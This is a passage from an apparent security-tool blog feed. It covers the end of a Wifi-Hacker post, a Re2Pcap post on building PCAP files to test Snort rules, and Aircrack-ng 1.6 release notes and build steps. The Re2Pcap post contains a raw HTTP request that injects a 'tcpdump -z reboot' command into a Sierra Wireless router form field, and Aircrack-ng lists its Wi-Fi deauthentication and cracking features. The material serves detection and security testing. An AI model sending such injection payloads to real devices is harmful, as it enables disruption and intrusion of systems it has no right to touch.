<a href="https://1.bp.blogspot.com/-kgRH3JaJtjk/XlRj1y13oJI/AAAAAAAARwI/T1CNOMVTC-sqUILpyTgzfmA1-RD-BgsFQCNcBGAsYHQ/s1600/wifi-hacker_2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-kgRH3JaJtjk/XlRj1y13oJI/AAAAAAAARwI/T1CNOMVTC-sqUILpyTgzfmA1-RD-BgsFQCNcBGAsYHQ/s640/wifi-hacker_2.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-c1AH1lkAH-E/XlRj3Kcv8qI/AAAAAAAARwU/soTd-ADpzL8qWXEiCX-qMUUKVXtFgYMXwCNcBGAsYHQ/s1600/wifi-hacker_3.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-c1AH1lkAH-E/XlRj3Kcv8qI/AAAAAAAARwU/soTd-ADpzL8qWXEiCX-qMUUKVXtFgYMXwCNcBGAsYHQ/s640/wifi-hacker_3.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-jU48cvvGX1M/XlRj2w1TMOI/AAAAAAAARwM/Nuui9fM-4Pw_neifsGXOjXjZzQq2-DHkQCNcBGAsYHQ/s1600/wifi-hacker_4.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-jU48cvvGX1M/XlRj2w1TMOI/AAAAAAAARwM/Nuui9fM-4Pw_neifsGXOjXjZzQq2-DHkQCNcBGAsYHQ/s640/wifi-hacker_4.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-nNGdm8niHaM/XlRj22trZFI/AAAAAAAARwQ/TOoTp8Of_VM-p_4m7D6J-PHzjOIIsCC4ACNcBGAsYHQ/s1600/wifi-hacker_5.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-nNGdm8niHaM/XlRj22trZFI/AAAAAAAARwQ/TOoTp8Of_VM-p_4m7D6J-PHzjOIIsCC4ACNcBGAsYHQ/s640/wifi-hacker_5.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-iz9AgmF1CCk/XlRj37opT4I/AAAAAAAARwY/2eOwAPrKt10d1CjGI5oOmZ0cpsKr1ZGTgCNcBGAsYHQ/s1600/wifi-hacker_6.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-iz9AgmF1CCk/XlRj37opT4I/AAAAAAAARwY/2eOwAPrKt10d1CjGI5oOmZ0cpsKr1ZGTgCNcBGAsYHQ/s640/wifi-hacker_6.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-gcNpd4pVy74/XlRj4ekFGdI/AAAAAAAARwc/7mG2-BaX4LsQU6ytZr9kAxgxY2b9H1JagCNcBGAsYHQ/s1600/wifi-hacker_7.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-gcNpd4pVy74/XlRj4ekFGdI/AAAAAAAARwc/7mG2-BaX4LsQU6ytZr9kAxgxY2b9H1JagCNcBGAsYHQ/s640/wifi-hacker_7.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-rLXbDBkOwaA/XlRj4ZAcOdI/AAAAAAAARwg/NA1UwwcW5WYf9u2m5MY1qh6V8yu6_gFJACNcBGAsYHQ/s1600/wifi-hacker_8.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-rLXbDBkOwaA/XlRj4ZAcOdI/AAAAAAAARwg/NA1UwwcW5WYf9u2m5MY1qh6V8yu6_gFJACNcBGAsYHQ/s640/wifi-hacker_8.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-VIXfCbdcYKs/XlRj49OYn0I/AAAAAAAARwk/Pyw7kuxPDFoSCJC2UAe8M3y_idCb2grBACNcBGAsYHQ/s1600/wifi-hacker_9.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-VIXfCbdcYKs/XlRj49OYn0I/AAAAAAAARwk/Pyw7kuxPDFoSCJC2UAe8M3y_idCb2grBACNcBGAsYHQ/s640/wifi-hacker_9.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-2XaO7UetD5c/XlRjzYaidkI/AAAAAAAARvs/KEEbD98LrJQ_6QzPrP1wLWgeRbZAvlzNgCNcBGAsYHQ/s1600/wifi-hacker_10.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-2XaO7UetD5c/XlRjzYaidkI/AAAAAAAARvs/KEEbD98LrJQ_6QzPrP1wLWgeRbZAvlzNgCNcBGAsYHQ/s640/wifi-hacker_10.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Odnl-J-UUjE/XlRjzR0iERI/AAAAAAAARv0/M9Y_bfm3ilQSC7HrMKri0SwCLXP-_ABzACNcBGAsYHQ/s1600/wifi-hacker_11.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-Odnl-J-UUjE/XlRjzR0iERI/AAAAAAAARv0/M9Y_bfm3ilQSC7HrMKri0SwCLXP-_ABzACNcBGAsYHQ/s640/wifi-hacker_11.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Iw8qk9y5DiQ/XlRj0m6286I/AAAAAAAARv4/remWsUFV82IVuIASxjorq04GCyxL5ufzQCNcBGAsYHQ/s1600/wifi-hacker_12.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-Iw8qk9y5DiQ/XlRj0m6286I/AAAAAAAARv4/remWsUFV82IVuIASxjorq04GCyxL5ufzQCNcBGAsYHQ/s640/wifi-hacker_12.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-280HM98BfGk/XlRj0iEOjAI/AAAAAAAARv8/KphStxEhz-UnfThZWC88unmnFwkQyiu4QCNcBGAsYHQ/s1600/wifi-hacker_13.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-280HM98BfGk/XlRj0iEOjAI/AAAAAAAARv8/KphStxEhz-UnfThZWC88unmnFwkQyiu4QCNcBGAsYHQ/s640/wifi-hacker_13.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-0livR3QhN8o/XlRj1rMToiI/AAAAAAAARwA/_PEHQyQUZmgzczctGNjR26LnTIDBfTCigCNcBGAsYHQ/s1600/wifi-hacker_14.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-0livR3QhN8o/XlRj1rMToiI/AAAAAAAARwA/_PEHQyQUZmgzczctGNjR26LnTIDBfTCigCNcBGAsYHQ/s640/wifi-hacker_14.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-iXilup8PMvs/XlRj1tjmAVI/AAAAAAAARwE/-Mc9XsCzgyg2PA42tX1WE5h6P8WnTDUvgCNcBGAsYHQ/s1600/wifi-hacker_15.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-iXilup8PMvs/XlRj1tjmAVI/AAAAAAAARwE/-Mc9XsCzgyg2PA42tX1WE5h6P8WnTDUvgCNcBGAsYHQ/s640/wifi-hacker_15.jpeg" width="640" /></a></div>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/esc0rtd3w/wifi-hacker" rel="nofollow" target="_blank" title="Download Wifi-Hacker">Download Wifi-Hacker</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-71450964650992409392020-02-07T08:30:00.000-03:002020-02-07T08:30:07.248-03:00Re2Pcap - Create PCAP file from raw HTTP request or response in seconds<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-W0AHKaLFegw/Xjoq9_9lhjI/AAAAAAAARnM/Kmi9daKc5GAASo8mB2I4MnQ5TorcKdI_gCNcBGAsYHQ/s1600/Re2Pcap_3_re2pcap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="213" data-original-width="1000" height="136" src="https://1.bp.blogspot.com/-W0AHKaLFegw/Xjoq9_9lhjI/AAAAAAAARnM/Kmi9daKc5GAASo8mB2I4MnQ5TorcKdI_gCNcBGAsYHQ/s640/Re2Pcap_3_re2pcap.png" width="640" /></a></div>
<br />
Re2Pcap is abbreviation for Request2Pcap and Response2Pcap. Community users can quickly create PCAP file using Re2Pcap and test them against <a href="https://snort.org/" rel="nofollow" target="_blank" title="Snort">Snort</a> rules.<br />
Re2Pcap allow you to quickly create PCAP file for raw HTTP request shown below<br />
<pre><code>POST /admin/tools/iplogging.cgi HTTP/1.1
Host: 192.168.13.31:80
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.13.31:80/admin/tools/iplogging.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 63
Cookie: token=1e9c07e135a15e40b3290c320245ca9a
Connection: close
tcpdumpParams=tcpdump -z reboot -G 2 -i eth0&stateRequest=start</code></pre>
<a name='more'></a><br />
<span style="font-size: large;"><b>Usage</b></span><br />
<pre><code>git clone https://github.com/Cisco-Talos/Re2Pcap.git
cd Re2Pcap/
docker build -t re2pcap .
docker run --rm --cap-add NET_ADMIN -p 5000:5000 re2pcap</code></pre>
OR<br />
<pre><code>docker run --rm --cap-add NET_ADMIN -p 5000:5000 --name re2pcap amitraut/re2pcap</code></pre>
Open <code>localhost:5000</code> in your web browser to access Re2Pcap or use <a href="https://github.com/Cisco-Talos/Re2Pcap/blob/master/Re2Pcap-cmd" rel="nofollow" target="_blank" title="Re2Pcap-cmd">Re2Pcap-cmd</a> script to interact with Re2Pcap <a href="https://www.kitploit.com/search/label/Container" target="_blank" title="container">container</a> to get PCAP in current working directory<br />
<br />
<span style="font-size: large;"><b>Requirements</b></span><br />
<ul>
<li>Docker</li>
<li>HTTP Raw Request / Response</li>
<li>Web Browser (for best results, please use <strong><em>Chromium</em></strong> based web browsers)</li>
</ul>
<br />
<span style="font-size: large;"><b>Advantages</b></span><br />
<ul>
<li>Easy setup. No complex multi-VM setup required</li>
<li>Re2Pcap runs on Alpine Linux based docker image that weighs less than 100 MB :D</li>
<li>Allows you to dump simulated raw HTTP request and response in to PCAP</li>
</ul>
<br />
<span style="font-size: large;"><b>Dockerfile</b></span><br />
<pre><code>FROM alpine
# Get required dependencies and setup for Re2Pcap
RUN echo "http://dl-cdn.alpinelinux.org/alpine/edge/testing" >> /etc/apk/repositories
RUN apk update && apk add python3 tcpdump tcpreplay
RUN pip3 install --upgrade pip
RUN pip3 install pexpect flask requests httpretty requests-toolbelt
COPY Re2Pcap/ /Re2Pcap
RUN cd Re2Pcap && chmod +x Re2Pcap.py
WORKDIR /Re2Pcap
EXPOSE 5000/tcp
# Run application at start of new container
CMD ["/usr/bin/python3", "Re2Pcap.py"]</code></pre>
<br />
<span style="font-size: large;"><b>Walkthrough</b></span><br />
<ul>
<li>Video walkthrough shows pcap creation for Sierra <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="Wireless">Wireless</a> AirLink ES450 ACEManager iplogging.cgi <a href="https://www.talosintelligence.com/reports/TALOS-2018-0746" rel="nofollow" target="_blank" title="command ">command </a><a href="https://www.kitploit.com/search/label/Injection" target="_blank" title="injection">injection</a> vulnerability using Re2Pcap web interface</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-S7cPKgomrVU/XjorIAva53I/AAAAAAAARnQ/QCDfjDdLN7Q6lB-Z_0McnwevSjNwBe8CwCNcBGAsYHQ/s1600/Re2Pcap_4_Re2Pcap_Demo.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="718" data-original-width="1265" height="362" src="https://1.bp.blogspot.com/-S7cPKgomrVU/XjorIAva53I/AAAAAAAARnQ/QCDfjDdLN7Q6lB-Z_0McnwevSjNwBe8CwCNcBGAsYHQ/s640/Re2Pcap_4_Re2Pcap_Demo.gif" width="640" /></a></div>
<br />
<ul>
<li>Video walkthrough of PCAP creation for Sierra Wireless AirLink ES450 ACEManager iplogging.cgi <a href="https://www.talosintelligence.com/reports/TALOS-2018-0746" rel="nofollow" target="_blank" title="command injection vulnerability">command injection vulnerability</a> using Re2Pcap-cmd script</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Nv35pNRdS9E/XjorOCUCeSI/AAAAAAAARnU/TSNAr3yN1uozRGMw0ebz6uTmrKIhNNJiwCNcBGAsYHQ/s1600/Re2Pcap_5_Re2Pcap_Demo1.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="712" data-original-width="1265" height="360" src="https://1.bp.blogspot.com/-Nv35pNRdS9E/XjorOCUCeSI/AAAAAAAARnU/TSNAr3yN1uozRGMw0ebz6uTmrKIhNNJiwCNcBGAsYHQ/s640/Re2Pcap_5_Re2Pcap_Demo1.gif" width="640" /></a></div>
<br />
<span style="font-size: large;"><b>Re2Pcap Workflow</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-s1Zrrns-i1Q/XjorToXojdI/AAAAAAAARnc/heCjS3arKWQJ6JlKQI5Y2Rf1bbZTay6dgCNcBGAsYHQ/s1600/Re2Pcap_6_workflow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="899" data-original-width="1600" height="358" src="https://1.bp.blogspot.com/-s1Zrrns-i1Q/XjorToXojdI/AAAAAAAARnc/heCjS3arKWQJ6JlKQI5Y2Rf1bbZTay6dgCNcBGAsYHQ/s640/Re2Pcap_6_workflow.png" width="640" /></a></div>
<br />
As shown in the above image Re2Pcap is Alpine Linux based Python3 application with Flask based web interface<br />
Re2Pcap parses the input data as raw HTTP request or response and actually perfoms client/server interaction while capturing packets. After the interaction Re2Pcap presents the captured packets as PCAP file<br />
<br />
<span style="font-size: large;"><b>Recommendations</b></span><br />
<ul>
<li>Please use Linux as your host operating system as Re2Pcap is well tested on Linux</li>
<li>If creating PCAP for <code>Host: somedomain:5000</code> i.e. port 5000, please change Flask application to run on other port by modifying Re2Pcap.Py <code>app.run</code> call otherwise PCAP will contain Flask application response</li>
</ul>
<br />
<span style="font-size: large;"><b>Limitations</b></span><br />
<ul>
<li> If raw HTTP request is without <code>Accept-Encoding:</code> header <code>Accept-Encoding: identity</code> is added in the reqeust<br />
<ul>
<li>There is known <a href="https://github.com/psf/requests/issues/2234" rel="nofollow" target="_blank" title="issue">issue</a> for it in python requests. Following is closing note for that issue</li>
</ul>
<blockquote>
That's really fairly terrible. Accept-Encoding: identity is always valid, the RFCs say so. It should be utterly harmless to send it along. Otherwise, removing this requires us to replace httplib. That's a substantial bit of work. =(</blockquote>
</li>
<li> The following are source and desination IPs in PCAPs from Re2Pcap<br />
<ul>
<li>Sourece IP: 10.10.10.1</li>
<li>Destination IP: 172.17.0.2 or (Re2Pcap Container's IP Address)</li>
</ul>
Please use <code>tcprewrite -D</code> option to modify desitnation IP to something else as per your need. You may also use <code>tcpprep</code> and <code>tcprewrite</code> to set other IPs as endpoints. Due to inconsistent result of <code>tcprewrite</code> I used alternative way to set different SRC/DST IPs<br />
</li>
<li> Specifying <code>HTTP/1.1 302 FOUND</code> as response will generated PCAP with maximum possible retries to reach resource specified in <code>Location:</code> header. Plase export the first HTTP stream using <a href="https://www.kitploit.com/search/label/Wireshark" target="_blank" title="wireshark">wireshark</a> in testing if you do not like the additional noise of other streams<br />
</li>
</ul>
<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Cisco-Talos/Re2Pcap" rel="nofollow" target="_blank" title="Download Re2Pcap">Download Re2Pcap</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-38209051993404964682020-01-26T08:42:00.000-03:002020-01-26T08:42:05.447-03:00Aircrack-ng 1.6 - Complete Suite Of Tools To Assess WiFi Network Security<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-TwcnabqVerc/Xi0KY7J-F2I/AAAAAAAARfk/4blgK4BuWOAyjyJ517amBWGHNw5S8BXEwCNcBGAsYHQ/s1600/Aircrack-ng%2B1.6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="645" data-original-width="645" src="https://1.bp.blogspot.com/-TwcnabqVerc/Xi0KY7J-F2I/AAAAAAAARfk/4blgK4BuWOAyjyJ517amBWGHNw5S8BXEwCNcBGAsYHQ/s1600/Aircrack-ng%2B1.6.png" /></a></div>
<br />
Aircrack-ng is a complete suite of tools to assess WiFi network security.<br />
It focuses on different areas of WiFi security:<br />
<ul>
<li>Monitoring: Packet capture and export of data to text files for further processing by third party tools.</li>
<li>Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.</li>
<li>Testing: Checking WiFi cards and driver capabilities (capture and injection).</li>
<li>Cracking: WEP and WPA PSK (WPA 1 and 2).</li>
</ul>
All tools are <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> which allows for heavy scripting. A lot of GUIs have taken advantage of this feature. It works primarily Linux but also Windows, OS X, FreeBSD, OpenBSD, NetBSD, as well as Solaris and even eComStation 2.<br />
<br />
It's been more than a year since the <a href="https://aircrack-ng.blogspot.com/2018/12/aircrack-ng-152.html">last release</a>, and this <a href="https://aircrack-ng.org/">one</a> brings a ton of improvements.<br />
<a name='more'></a><br />
The most noticeable change are the rate display in Airodump-ng.
Previously, it went up to 54Mbit. Now, it takes into account the
complexity of 802.11n/ac and calculates the maximum rate that can be
achieved on the AP. Expect 802.11ax rates in the next release. We
brought basic UTF-8 support for ESSID and if you ever come across <a href="https://en.wikipedia.org/wiki/WPA3#WPA3" target="_blank">WPA3</a> or <a href="https://en.wikipedia.org/wiki/Opportunistic_Wireless_Encryption" target="_blank">OWE</a>,
this will be displayed correctly as well. Airodump-ng has had the
ability to read PCAP files for quite some time, which can be handy to
generate one of the <a href="https://aircrack-ng.org/doku.php?id=airodump-ng#text_files_containing_access_points_and_clients" target="_blank">CSV/netxml</a>
or other output formats available. However, signal levels were not
displayed; this has now been fixed. A new option has been added to read
the files in realtime, instead of reading all at once.<br />
<br />
<b>Huge</b> improvements have been done under the hood as well. Code has been cleaned up, deduplicated (<a href="https://github.com/aircrack-ng/aircrack-ng/pull/2010" target="_blank">Pull Request 2010</a>), reorganized (<a href="https://github.com/aircrack-ng/aircrack-ng/pull/2032" target="_blank">Pull Request 2032</a>), which lead to a lot of fixes.<br />
<br />
This reorganization also updated the build system, which now requires
automake 1.14+. This was a problem on CentOS 7, but we provide a script
to install these requirements from source to solve the issue; although
automake 1.14 (and other dependencies) have been released 6+ years ago,
CentOS is the only distribution that doesn't have it, and it was decided
to provide a script to install the requirements was a small price to
pay to improve and simplify the build system.<br />
<br />
Other tools received fixes as well:<br />
<ul>
<li>Along with a few fixes, Airmon-ng now handles more network managers, and persistent ones; no need to run <b><span style="font-family: "courier new" , "courier" , monospace;">airmon-ng check kill</span></b> a few times for the network managers that keep restarting.</li>
<li>Airdecap-ng can now decrypt both sides of the conversation when <a href="https://en.wikipedia.org/wiki/Wireless_Distribution_System" target="_blank">WDS</a> is in use.</li>
<li>As usual, we updated <a href="https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe" target="_blank">WPE patches</a> for freeradius and HostAPd.</li>
<li>Python 2 is dead as of <a href="https://legacy.python.org/dev/peps/pep-0373/" target="_blank">January 1st</a>, and now all our scripts support Python 3. If you are still running Python 2, don't worry, they are still backward compatible.</li>
<li>Aircrack-ng contains fixes for a few crashes and other regressions, as
well as improved CPU detection in some cases (-u option). </li>
</ul>
<br />
We have been working on our infrastructure and have a <a href="https://en.wikipedia.org/wiki/Buildbot">buildbot</a> server with quite a few systems. If you head up to our <a href="https://buildbot.aircrack-ng.org/" target="_blank">buildbot landing page</a>,
you can see the extent of the build system: 14 systems to test build on
top of AppVeyor, TravisCI, and Coverity Scan, plus one to automatically
package it and <a href="https://packagecloud.io/aircrack-ng" target="_blank">upload packages to packagecloud.io</a>.
It gets triggered every time we push code to our GitHub repository and
you can see the details of each build for each commit on GitHub. We have
an earlier blog post where you can find some <a href="https://aircrack-ng.blogspot.com/2018/11/continuous-integrationcontious-delivery.html" target="_blank">details of our CI/CD</a>.<br />
We are currently working on bringing Mac infrastructure as well.<br />
<br />
We keep working on our automated tests, and a few have been added; this release also brings <a href="https://en.wikipedia.org/wiki/Integration_testing">integration tests</a> (16 for now) to automatically test different features of airodump-ng, aireplay-ng, airbase-ng and others.<br />
<br />
In case you find security issues in Aircrack-ng or our domains, we
recently added a security policy to explain how to report them. It is on
<a href="https://github.com/aircrack-ng/aircrack-ng/security/policy" target="_blank">GitHub</a>, on our <a href="https://aircrack-ng.org/security.html">website</a>, as well as <a href="https://aircrack-ng.org/.well-known/security.txt">security.txt</a>.<br />
<br />
And finally, what you've been waiting for, the full changelog:<br />
<ul>
<li>Aircrack-ng: Added support for MidnightBSD
</li>
<li>Aircrack-ng: Fixed ARM processors display with -u
</li>
<li>Aircrack-ng: Fixed AVX-512F support
</li>
<li>Aircrack-ng: Fixed cracking speed calculation
</li>
<li>Aircrack-ng: Fixed cracking WEP beyond 10k IVS
</li>
<li>Aircrack-ng: Fixed creating new session and added test case
</li>
<li>Aircrack-ng: Fixed encryption display in some cases when prompting for network to crack
</li>
<li>Aircrack-ng: Fixed exiting Aircrack-ng in some cases
</li>
<li>Aircrack-ng: Fixed logical and physical processor count detection
</li>
<li>Aircrack-ng: Fixed PMKID length check
</li>
<li>Aircrack-ng: Various fixes and improvements to WPA cracking engine and its performance
</li>
<li>Airdecap-ng: Decrypt both directions when WDS is in use
</li>
<li>Airdecap-ng: Fixed decrypting WPA PCAP when BSSID changes
</li>
<li>Airgraph-ng: Added support for WPA3
</li>
<li>Airgraph-ng: Switch to argparse
</li>
<li>Airmon-ng: Added detection for wicd, Intel Wireless Daemon (iwd), net_applet
</li>
<li>Airmon-ng: Handle case when avahi keeps getting restarted
</li>
<li>Airmon-ng: Indicates when interface doesn't exist
</li>
<li>Airodump-ng: Added autocolorization interactive key
</li>
<li>Airodump-ng: Added option to read PCAP in realtime (-T)
</li>
<li>Airodump-ng: Added PMKID detection
</li>
<li>Airodump-ng: Added support for GMAC
</li>
<li>Airodump-ng: Added support for WPA3 and OWE (Enhanced Open)
</li>
<li>Airodump-ng: Basic UTF-8 support
</li>
<li>Airodump-ng: Checked management frames are complete before processing IE to avoid switch from WEP to WPA
</li>
<li>Airodump-ng: Display signal when reading from PCAP
</li>
<li>Airodump-ng: Fixed netxml output with hidden SSID
</li>
<li>Airodump-ng: Improved rates calculation for 802.11n/ac
</li>
<li>Airtun-ng: Fixed using -p with -e
</li>
<li>Autoconf: Fixed order of ssl and crypto libraries
</li>
<li>dcrack: Fixed client reporting benchmark
</li>
<li>dcrack: Now handles chunked encoding when communicating (default in Python3)
</li>
<li>Freeradius-WPE: Updated patch for v3.0.20
</li>
<li>General: Added NetBSD endianness support
</li>
<li>General: Added python3 support to scripts
</li>
<li>General: Added script to update autotools on CentOS 7
</li>
<li>General: Added security policy to report security issues
</li>
<li>General: Reorganizing filesystem layout (See PR 2032), and switch to automake 1.14+
</li>
<li>General: Convert to non-recursive make (part of PR 2032)
</li>
<li>General: Deduplicating functions and code cleanups
</li>
<li>General: Fixed packaging on cygwin due to openssl library name change
</li>
<li>General: Fixed SPARC build on Solaris 11
</li>
<li>General: Removed coveralls.io
</li>
<li>General: Updated dependencies in README.md/INSTALLING
</li>
<li>General: Use upstream radiotap libary, as a sub-tree
</li>
<li>General: various fixes and improvements (code, CI, integration tests, coverity)
</li>
<li>HostAPd-WPE: Updated for v2.9
</li>
<li>Manpages: Fixes and improvements
</li>
<li>Tests: Added Integration tests for aireplay-ng, airodump-ng, aircrack-ng, airbase-ng, and others
</li>
<li>Tests: Added tests for airdecap-ng, aircrack-ng</li>
</ul>
<br />
<span style="font-size: x-large;"><b>Building</b></span><br />
<br />
<span style="font-size: large;"><b>Requirements</b></span><br />
<ul>
<li>Autoconf</li>
<li>Automake</li>
<li>Libtool</li>
<li>shtool</li>
<li>OpenSSL development package or libgcrypt development package.</li>
<li>Airmon-ng (Linux) requires ethtool.</li>
<li>On windows, cygwin has to be used and it also requires w32api package.</li>
<li>On Windows, if using clang, libiconv and libiconv-devel</li>
<li>Linux: LibNetlink 1 or 3. It can be disabled by passing --disable-libnl to configure.</li>
<li>pkg-config (pkgconf on FreeBSD)</li>
<li>FreeBSD, OpenBSD, NetBSD, Solaris and OS X with macports: gmake</li>
<li>Linux/Cygwin: make and Standard C++ Library development package (Debian: libstdc++-dev)</li>
</ul>
<br />
<span style="font-size: large;"><b>Optional stuff</b></span><br />
<ul>
<li>If you want SSID filtering with regular expression in airodump-ng (-essid-regex) pcre development package is required.</li>
<li>If you want to use airolib-ng and '-r' option in aircrack-ng, SQLite development package >= 3.3.17 (3.6.X version or better is recommended)</li>
<li>If you want to use Airpcap, the 'developer' directory from the CD/ISO/SDK is required.</li>
<li>In order to build <code>besside-ng</code>, <code>besside-ng-crawler</code>, <code>easside-ng</code>, <code>tkiptun-ng</code> and <code>wesside-ng</code>, libpcap development package is required (on Cygwin, use the Aircap SDK instead; see above)</li>
<li>For best performance on FreeBSD (50-70% more), install gcc5 (or better) via: pkg install gcc9</li>
<li>rfkill</li>
<li>If you want <a href="https://www.kitploit.com/search/label/Airodump-ng" target="_blank" title="Airodump-ng">Airodump-ng</a> to log GPS coordinates, gpsd is needed</li>
<li>For best performance on SMP machines, ensure the hwloc library and headers are installed. It is strongly recommended on high core count systems, it may give a serious speed boost</li>
<li>CMocka for unit testing</li>
<li>For intergation testing on Linux only: tcpdump, HostAPd, WPA Supplicant and screen</li>
</ul>
<br />
<span style="font-size: large;"><b>Installing required and optional dependencies</b></span><br />
Below are instructions for installing the basic <a href="https://www.kitploit.com/search/label/Requirements" target="_blank" title="requirements">requirements</a> to build <code>aircrack-ng</code> for a number of operating systems.<br />
<strong>Note</strong>: CMocka, tcpdump, screen, HostAPd and WPA Supplicant should not be dependencies when packaging Aircrack-ng.<br />
<br />
<b>Linux</b><br />
<br />
<b>Debian/Ubuntu</b><br />
<pre><code>sudo apt-get install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils</code></pre>
<br />
<b>Fedora/CentOS/RHEL</b><br />
<pre><code>sudo yum install libtool pkgconfig sqlite-devel autoconf automake openssl-devel libpcap-devel pcre-devel rfkill libnl3-devel gcc gcc-c++ ethtool hwloc-devel libcmocka-devel git make file expect hostapd wpa_supplicant iw usbutils tcpdump screen</code></pre>
<strong>Note</strong>: on CentOS and RedHat, HostAPd requires 'epel' repository to be enabled: sudo yum install epel-release<br />
<br />
<b>openSUSE</b><br />
<pre><code>sudo zypper install autoconf automake libtool pkg-config libnl3-devel libopenssl-1_1-devel zlib-devel libpcap-devel sqlite3-devel pcre-devel hwloc-devel libcmocka-devel hostapd wpa_supplicant tcpdump screen iw gcc-c++ gcc</code></pre>
<br />
<b>Mageia</b><br />
<pre><code>sudo urpmi autoconf automake libtool pkgconfig libnl3-devel libopenssl-devel zlib-devel libpcap-devel sqlite3-devel pcre-devel hwloc-devel libcmocka-devel hostapd wpa_supplicant tcpdump screen iw gcc-c++ gcc make</code></pre>
<br />
<b>Alpine</b><br />
<pre><code>sudo apk add gcc g++ make autoconf automake libtool libnl3-dev openssl-dev ethtool libpcap-dev cmocka-dev hostapd wpa_supplicant tcpdump screen iw pkgconf util-linux sqlite-dev pcre-dev linux-headers zlib-dev</code></pre>
<br />
<b>BSD</b><br />
<br />
<b>FreeBSD</b><br />
